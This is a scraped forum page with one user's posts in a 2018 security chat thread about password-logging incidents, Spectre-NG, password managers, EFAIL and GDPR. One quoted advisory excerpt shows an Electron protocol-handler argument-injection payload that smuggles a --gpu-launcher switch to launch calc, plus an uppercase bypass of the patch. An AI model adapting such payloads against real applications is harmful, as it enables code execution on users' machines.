Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
 
  • Locked thread
anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
github was apparently doing plaintext logging of some passwords https://twitter.com/SwitHak/status/991416974252167169

Adbot
ADBOT LOVES YOU

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
well this is certainly worse than the github one, and not just because the article/press release has zero information in it https://twitter.com/Reuters/status/992133254550519808

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
apparently twitter thought they didn't need to tell anyone about the password disclosure https://twitter.com/paraga/status/992135139994943488

later he walked that back https://twitter.com/paraga/status/992146630232043520

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
is it a coincidence that tavis went on vacation and now there's eight more "spectre next generation" flaws that all have cves and are being worked on in secret https://www.heise.de/ct/artikel/Exclusive-Spectre-NG-Multiple-new-Intel-CPU-flaws-revealed-several-serious-4040648.html

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Father Jack posted:

is 1password still the best choice for a low hassle, cross platform password manager?
yes. if you're on windows get the v4 version

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Rufus Ping posted:

v7 beta has standalone vaults now
last i heard it was still in alpha and they got rid of the bonjour lan sync

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

EL BROMANCE posted:

Has something changed with the way the site logs in in the last year or so? I have a voting site for the GBS Eurovision thread that does a quick validation (using the old 'check if a string exists in a users profile' thing) which needs the site to be able to log in and do this check. I can't get it to validate this time round, and I'm thinking this is where things are falling over.

The URL I'm using to login is:
code:
https://forums.somethingawful.com/account.php?action=login&username={username}&password={password}
If I do this in the browser, it just goes to a blank screen and on refreshing the forum, it hasn't logged me in. Is there a new URL, or have things changed to the degree I probably can't fix this?

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Lain Iwakura posted:

on and off i want to find a mechanical switch still in use somewhere in this world. i don't know where you'd still find one but not in the west at least
this one isn't in use but

https://twitter.com/anthonypants/status/993204605872881664

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

LP0 ON FIRE posted:

install Hiya. changed my life
lmao have you looked at their privacy policy https://hiya.com/hiya-data-policy

or their other privacy policy https://hiya.com/privacy

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Bulgogi Hoagie posted:

from the appel thread
owns

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Schadenboner posted:

https://en.wikipedia.org/wiki/Desire_path

It appears that your lovely yard is the problem, friendo?
consider that the buddha was right about desire all along

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
excel and the rest of the office suite has vba, which is kind of like vbscript, but there's still a lot of COM. there's not even any good first-party powershell tools for office right now; the importexcel module is made by some guy

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
could somebody please explain what this means thank you https://access.redhat.com/security/vulnerabilities/pop_ss

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Subjunctive posted:

Don't they just save a token from the payment processor?
yes and they only save the last card you entered

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Lutha Mahtin posted:

i saw some people on twitter talking about the free swag they got from Klout. a lot of it was little discounts and gift cards to stores and restaurants. the biggest-sounding one i saw was some guy who said he got a free car rental out of it
that sort of stuff did happen, but they (or the brands they partnered with) stopped offering substantial rewards many years ago

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
https://gizmodo.com/1825938208

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
https://twitter.com/geoffwhite247/status/994998863806324741

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Subjunctive posted:

trivially not, I think. it's entirely possible to encrypt without a message digest

but maybe I'm misreading again
yes, you can encrypt a message such that there's no way for your recipient to determine that the message they received is the message that was sent. that is entirely possible.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

~Coxy posted:

everyone favourite netbank is finally getting rid of their OSK


Hopefully this mean you'll be allowed capitals/symbols and more than 6 character in your password

(visual aid):
why do you have three mouse cursors

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Salt Fish posted:

I like the creativity here:


https://www.schneier.com/blog/archives/2018/04/obscure_e-mail_.html


James Fisher, who wrote the post, argues that it's Google's fault. Ignoring dots might give people an enormous number of different email addresses, but it's not a feature that people actually want. And as long as other sites don't follow Google's lead, these sorts of problems are possible.

I think the problem is more subtle. It's an example of two systems without a security vulnerability coming together to create a security vulnerability. As we connect more systems directly to each other, we're going to see a lot more of these. And like this Google/Netflix interaction, it's going to be hard to figure out who to blame and who -- if anyone -- has the responsibility of fixing it.
i'm the link on "a throwaway card number" which goes to a page which reads, "Sorry, but we're no longer taking applications or inquires about new accounts."

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Raere posted:

In this week's Adobe Reader patch, they fixed 'NTLM SSO hash theft':

https://helpx.adobe.com/acrobat/kb/mitigation-NTLM-dictionary-attacks.html

How on earth is a PDF renderer causing vulnerabilities in NTLM?
very carefully

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

redleader posted:

if i were a spammer, i'd go out of my way to strip +whatever from gmail addresses specifically to annoy people who care enough to use that feature
is it more annoying to strip them after they're entered, or to pretend like they're invalid

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
"used to be"?

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

NEED MORE MILK posted:

im guessing youre skimming over that/misreading it

that was the dialog that IE would pop up when you went to a site that was using https
and at what point did they remove it from internet explorer

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

pseudorandom name posted:

so am I understanding the situation correctly when I say everybody involved with PGP is a dick?
well, https://blog.cryptographyengineering.com/2018/05/17/was-the-efail-disclosure-horribly-screwed-up/

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
https://twitter.com/macewan/status/998564299126820865

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Shaggar posted:

thats what I was thinking, but what happens if the kid changes their apple password?
maybe it asks for your icloud password?

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
literally the easiest way i can think of capturing someone's changed icloud password would be to throw up a prompt on their iphone telling them to type it in on every failed polling attempt

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

rjmccall posted:

cache reveals everything around me

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

ate poo poo on live tv posted:

Actually it was a 30k payout plus $1,337 bonus, plus 5k for another bug. Also prompt payout which is pretty nice.
according to the article,

Achmed Jones posted:

it was $31337 for rce and $5k for a different issue

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Truga posted:

the original poster did put a letsencrypt cert on, the page was https lmao
yeah it's still the pink scrolly one for me and the https site is signed by let's encrypt
https://www.myhomemanager.sony.com

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Wiggly Wayne DDS posted:

happy gdpr everyone

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Doom Mathematic posted:

'Twas the night before GDPR and all through the house it was not known how many creatures were stirring because we do not have a legitimate business reason to store that information.
https://twitter.com/moonpolysoft/status/999798397887381506

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
i couldn't think of any of those places i'd call that would be affected by gdpr, but then i remembered that a lot of callcenters are overseas

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

quote:

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.
code:
<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>
Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:
code:
<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script>

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
https://twitter.com/xorrior/status/1000053217298997257

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Gazpacho posted:

i work specifically in the software domain of identifying and tracking people and first there was this equifax breach which sent a shitload of security mandates my way and now there's the facebook and GDPR blowup and in the same time frame our headcount has been slashhed, idk how i can take another month of this

but none of these stupid mandates has changed my conviction that the software i worked on provided value to customers and end users
lol

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Gazpacho posted:

there are no specific mandates regarding gdpr or data management yet but the previous round of mandates showed that the management is inclined to overreact blindly with zero fucks given about resources or preserving the system fucnctions that we need to develop and maintain product features
i'm incredibly sorry that for the very first time in your career you've been told to consider information security. please accept my warmest condolences and sympathies

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Gazpacho posted:

gee whiz it's like i'm the only person in yospos who ever worked under management who thought basic best practices were "not a priority" (until they were, and then having resources to deploy them was not a priority)
no but you did come in here to lay the blame squarely at the feet of the regulations, of which the rest of the world has known about for uhhhhhhhhhhhhhh two years?

Adbot
ADBOT LOVES YOU

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
i mean if they're getting blindsided by new laws on the day enforcement begins it sounds like their company might not even have a legal department

  • Locked thread